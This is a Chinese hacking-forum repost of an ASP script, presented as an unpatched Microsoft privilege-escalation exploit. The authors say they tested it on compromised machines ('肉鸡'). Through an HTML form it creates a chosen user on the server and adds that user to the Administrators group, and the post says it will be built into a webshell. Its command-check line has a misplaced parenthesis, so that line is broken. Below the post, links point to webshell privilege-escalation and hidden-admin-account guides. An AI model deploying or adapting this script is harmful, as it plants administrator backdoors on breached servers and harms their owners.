添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]

添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]
作者:蓝屏,凯文 文章来源:冰点极限
其实上个礼拜我和凯文就在我的肉鸡上测试了,还有河马史诗.结果是在user权限下成功添加Administrators组的用户了(虽然我不敢相信我的眼睛).
上次凯文不发话,我不敢发布啊....现在在他的blog 上看到他发布了,就转来了咯(比我上次测试时还改进了一点,加了个表单).这下大家有福咯```

反正代码是对的,但是很少能成功,具体的看运气了。。呵呵,下一步我想把他整合到海洋里面去。嘿嘿。 


代码如下:

<head>.network对象脚本权限提升漏洞利用工具</head> 
<form action="useradd.asp" method=post> 
用户:<input name="username" type="text" value="kevin1986"><br> 
密码:<input name="passwd" type="password"><br> 
<input type="submit" Value="添 加"> 
</form>

<%@codepage=936 
on error resume next 
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then 
response.write "iP !s n0T RiGHt" 
else 
if request("username")<>"" then 
username=request("username") 
passwd=request("passwd") 
Response.Expires=0 
Session.TimeOut=50 
Server.ScriptTimeout=3000 
set lp=Server.createObject("WSCRIPT.NETWORK") 
oz="WinNT://"&lp.ComputerName 
Set ob=GetObject(oz) 
Set oe=GetObject(oz&"/Administrators,group") 
Set od=ob.create("user",username) 
od.SetPassword passwd 
od.SetInfo 
oe.Add oz&"/"&username 
if err then 
response.write "哎~~今天你还是别买6+1了……省下2元钱买瓶可乐也好……" 
else 
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登录")>0 then 
response.write "虽然没有错误,但是好象也没建立成功.你一定很郁闷吧" 
else 
Response.write "OMG!"&username&"帐号居然成了!这可是未知漏洞啊.5,000,000RMB是你的了" 
end if 
end if 
else 
response.write "请输入输入用户名" 
end if 
end if 
%>

(0)

相关推荐

  • Linux给普通用户加超级用户权限的方法

    问题假设用户名为:ali如果用户名没有超级用户权限,当输入 sudo + 命令 时, 系统提示: 复制代码 代码如下: ali is not in the sudoers file.  This incident will be reported. 解决1. 进入超级用户模式.即输入"su",系统会让你输入超级用户密码,输入密码后就进入了超级用户模式. 2. 添加文件的写权限. 复制代码 代码如下: chmod u+w /etc/sudoers 3. 编辑/etc/sudoers文件.

  • 找回Redhat Linux 7.2的超级用户密码

    笔者的机器上装有Redhat Linux7.2操作系统,安装了KDE和GNOME桌面,因在安装时只设了超级用户root,但超级用户的权限太大了,只适用于系统维护及安装软件时使用,平常使用应该用普通用户来登录.所以需要新建一个普通用户.这倒也简单,打开"菜单→系统→账号管理器",添加一个用户不就得了!可麻烦事就来了:退出以后再用root登录,输入密码,啊!密码错误,进不了系统了.我知道Redhat7.2下用户密码是保存在/etc/shadow里,应从这里寻找突破口. 1.把系统安装光盘插

  • 系统中多种隐藏超级用户添加方法第1/2页

    一.如何在图形界面建立隐藏的超级用户 图形界面下适用本地或开3389终端服务的肉鸡上.上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe.我说的这个方法将不用到psu.exe这个程序.因为Windows2000有两个注册表编辑器:regedit.exe和regedt32.exe.XP中regedit.exe和regedt32.exe实为一个程序,修改键值的权限时在右键中点"权限"来修改.对re

  • 拒绝星外虚拟主机管理系统超级用户freehostrunat远程桌面提高安全

    拒绝星外虚拟主机管理系统超级用户freehostrunat远程桌面提高安全

    拒绝freehostrunat用户远程桌面提高安全下面是WIN2008操作流程如下:你可以拒绝freehostrunat用户远程桌面提高安全,办法如下: 在服务器上,开始中,在管理工具中,打开本地安全策略, 点左边的本地策略,再点用户权限分配,再双击右边的拒绝通过远程桌面服务登陆, 再点添加用户或组,输入freehostrunat用户名,确定,确定后就生效了.========================================下面是WIN2003操作流程如下: windows 200

  • 添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]

    添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞] 作者:蓝屏,凯文 文章来源:冰点极限其实上个礼拜我和凯文就在我的肉鸡上测试了,还有河马史诗.结果是在user权限下成功添加Administrators组的用户了(虽然我不敢相信我的眼睛). 上次凯文不发话,我不敢发布啊....现在在他的blog 上看到他发布了,就转来了咯(比我上次测试时还改进了一点,加了个表单).这下大家有福咯``` 反正代码是对的,但是很少能成功,具体的看运气了..呵呵,下一步我想把他整合到海洋里面去.嘿嘿

  • 超全的webshell权限提升方法

    WEBSHELL权限提升技巧  c: d: e:.....  C:\Documents and Settings\All Users\「开始」菜单\程序\  看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,  C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\  看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆  c:\Pr

  • webshell权限提升技巧

    WEBSHELL权限提升技巧 c: d: e:.....  C:\Documents and Settings\All Users\「开始」菜单\程序\  看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,  C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\  看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆  c:\Pro

  • Win2008 蓝屏漏洞揭秘

    Win2008 蓝屏漏洞揭秘

    9月初,在各大安全网站上登载了一个Windows操作系统的蓝屏漏洞的消息,这个漏洞的出现如同一颗石子,打破了近半年来Windows没有爆出重大漏洞的沉寂. 蓝屏漏洞威胁的是服务器操作系统Windows Server 2008,这意味着如果Windows Server 2008蓝屏,将导致服务器停止服务--目前,漏洞的利用代码还限制在小范围内,不过漏洞攻击工具却已经研制出来了,现在为大家揭秘蓝屏漏洞的利用过程. 问题: Windows Server 2008蓝屏漏洞 危害: 服务器出现蓝屏停止服务

  • 系统蓝屏的代码详解

    系统蓝屏代码全集 00000001 不正确的函数. 2 0×00000002 系统找不到指定的档案. 3 0×00000003 系统找不到指定的路径. 4 0×00000004 系统无法开启档案. 5 0×00000005 拒绝存取. 6 0×00000006 无效的代码. 7 0×00000007 储存体控制区块已毁. 8 0×00000008 储存体空间不足,无法处理这个指令. 9 0×00000009 储存体控制区块地址无效. 10 0×0000000A 环境不正确. 11 0×00000

  • 非常完整全面的蓝屏代码解读

    一.蓝屏含义     1.故障检查信息     ***STOP 0x0000001E(0xC0000005,0xFDE38AF9,0x0000001,0x7E8B0EB4)     KMODE_EXCEPTION_NOT_HANDLED ***其中错误的第一部分是停机码(Stop Code)也就是STOP 0x0000001E,      用于识别已发生错误的类型, 错误第二部分是被括号括起来的四个数字集, 表示随机的开发人员定义的参数(这个参数对于普通用户根本无法理解,      只有驱动程序

  • 关于windows server 2012 DC 环境 重启后蓝屏代码:0xc00002e2的问题

    关于windows server 2012 DC 环境 重启后蓝屏代码:0xc00002e2的问题

    1.win. server 2012 好久没有重启了,今天寻思重启一下. 然后蓝屏了. 蓝屏错误代码: 0xc00002e2 2.问题说明: 说一下起因: 是由于DC中的ntds.dit文件问题. 前提:是DC服务器也就是域控.才有效. 3.问题解决: 3.1 进入目录修改 1.蓝屏重启后会自动进入修复模式,在修复模式下选择疑难解答-->高级选项-->启动设置,重启进入安全模式选择界面,选择从 目录修复服务 启动2.按F8也可以找到目录修改服务 3.2关于登陆问题 1.使用管理员登陆.2.不是

  • UCenter 批量添加用户的php代码

    复制代码 代码如下: <? //作者:www.tongqiong.com //header("content-type:text/html; charset=utf-8"); //include_once("include/config.php"); //include_once("include/db_mysql.inc.php"); ////include_once("include/n_public_function.php

  • ASP.NET Core2静默获取微信公众号的用户OpenId实例代码

    前言 最近在做个微信公众号的项目,需要将入口放置在公众号二级菜单内,通过点击该菜单链接后进入到该项目中去,进入到项目后程序会自动通过微信公众号的API完成用户的OpenId获取.需求很简单,实现起来也不复杂,于是在一番折腾后需求实现了.为此,写下此文仅为初次接触的朋友提供个小小的帮助. 准备 老规矩,在开始动手前,咱们先简单介绍下实现的组成部分,如下: 微信公众号静默获取用户OpenId:要实现该功能,可以通过微信公众号提供的"网页授权"接口完成(官网描述:以snsapi_base为s

随机推荐